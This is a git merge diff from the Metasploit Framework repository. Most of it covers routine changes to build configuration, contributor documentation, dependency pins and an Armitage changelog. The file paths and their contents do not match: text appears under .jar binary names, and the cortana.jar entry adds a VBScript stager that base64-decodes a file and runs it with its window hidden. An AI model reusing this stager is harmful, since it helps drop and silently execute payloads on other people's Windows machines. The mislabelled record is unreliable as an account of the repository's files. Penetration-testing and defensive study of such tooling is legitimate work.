Merge branch 'master' into nullbind-mssql_linkcrawler

Author: sinn3r

.gitignore

@@ -6,6 +6,8 @@
 .yardoc
 # Mac OS X files
 .DS_Store
+# simplecov coverage data
+coverage
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
 doc

.travis.yml

@@ -0,0 +1,8 @@
+language: ruby
+rvm:
+  - '1.8.7'
+  - '1.9.3'
+
+notifications:
+  irc: "irc.freenode.org#msfnotify"
+

CONTRIBUTING.md

@@ -0,0 +1,33 @@
+# Contributing to Metasploit
+
+## Reporting Bugs
+
+If you would like to report a bug, please take a look at [our Redmine
+issue
+tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
+-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
+
+If your bug is new and you'd like to report it you will need to
+[register
+first](https://dev.metasploit.com/redmine/account/register). Don't
+worry, it's easy and fun and takes about 30 seconds.
+
+## Contributing Metasploit Modules
+
+If you have an exploit that you'd like to contribute to the Metasploit
+Framework, please familiarize yourself with the
+**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
+document in the
+Metasploit-Framework repository. There are many mysteries revealed in
+HACKING concerning code style and content.
+
+[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
+should corellate with modules at a 1:1 ratio
+-- there is rarely a good reason to have two, three, or ten modules on
+one pull request, as this dramatically increases the review time
+required to land (commit) any of those modules.
+
+Pull requests tend to be very collaborative for Metasploit -- do not be
+surprised if your pull request to rapid7/metasploit-framework triggers a
+pull request back to your own fork. In this way, we can isolate working
+changes before landing your PR to the Metasploit master branch.

Gemfile

@@ -5,7 +5,7 @@ gem 'activesupport', '>= 3.0.0'
 # Needed for Msf::DbManager
 gem 'activerecord'
 # Database models shared between framework and Pro.
-gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git'
+gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
 # Needed for module caching in Mdm::ModuleDetails
 gem 'pg', '>= 0.11'
 
@@ -24,4 +24,7 @@ end
 group :test do
   # testing framework
   gem 'rspec'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  gem 'simplecov', '0.5.4', :require => false
 end

Gemfile.lock

@@ -1,8 +1,9 @@
 GIT
   remote: git://github.com/rapid7/metasploit_data_models.git
-  revision: dd6c3a31c5ad8b55f4913b5ba20307178ba9c7bf
+  revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
+  tag: 0.3.0
   specs:
-    metasploit_data_models (0.0.2)
+    metasploit_data_models (0.3.0)
       activerecord
       activesupport
       pg
@@ -27,7 +28,7 @@ GEM
     coderay (1.0.8)
     diff-lcs (1.1.3)
     i18n (0.6.1)
-    method_source (0.8)
+    method_source (0.8.1)
     multi_json (1.3.6)
     pg (0.14.1)
     pry (0.9.10)
@@ -44,6 +45,10 @@ GEM
     rspec-expectations (2.11.3)
       diff-lcs (~> 1.1.3)
     rspec-mocks (2.11.3)
+    simplecov (0.5.4)
+      multi_json (~> 1.0.3)
+      simplecov-html (~> 0.5.3)
+    simplecov-html (0.5.3)
     slop (3.3.3)
     tzinfo (0.3.33)
     yard (0.8.2.1)
@@ -59,4 +64,5 @@ DEPENDENCIES
   rake
   redcarpet
   rspec
+  simplecov (= 0.5.4)
   yard

README.md

@@ -1,5 +1,5 @@
 
-Metasploit
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.
@@ -40,10 +40,11 @@ reading some of the great tutorials online:
 
 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on github which will
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
 walk you through the whole process starting from installing all the
 dependencies, to cloning the repository, and finally to submitting a
-pull request.
+pull request. For slightly more info, see
+[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
 
 
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"

data/armitage/armitage.jar

@@ -1,6 +1,29 @@
 Armitage Changelog
 ==================
 
+26 Nov 12 (tested against msf 16114)
+---------
+- Windows command shell tab is now friendlier to commands that prompt
+  for input (e.g., time command)
+- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
+  the framework's new exploit/windows/local modules too
+- [host] -> Shell -> Post Modules now shows the framework's unix/local 
+  and exploit/linux/local modules
+- Added Ctrl+I shortcut. Lets you choose a session to interact with.
+- Added Steal Token button to Processes dialog.
+- Armitage now asks Metasploit for a non-expiring authentication token.
+  This will prevent Armitage from losing its access to msfrpcd when you
+  put your computer to sleep or pause the VM running Metasploit.
+- add_user and add_[local]group_user now show all of their output when
+  the -h flag is used to operate on a remote host.
+- added a Delete menu to creds table. Right-click a cred to delete it
+
+Cortana Updates (for scripters)
+--------
+- aliased &data_delete to &data_clear to match the documentation.
+- &file_get, &loot_get, and &file_content no longer delete the remote 
+  file when connected to a teamserver.
+
 16 Oct 12 (tested against msf 15972)
 ---------
 - Added port 5985 to MSF Scans list.

data/armitage/cortana.jar

@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub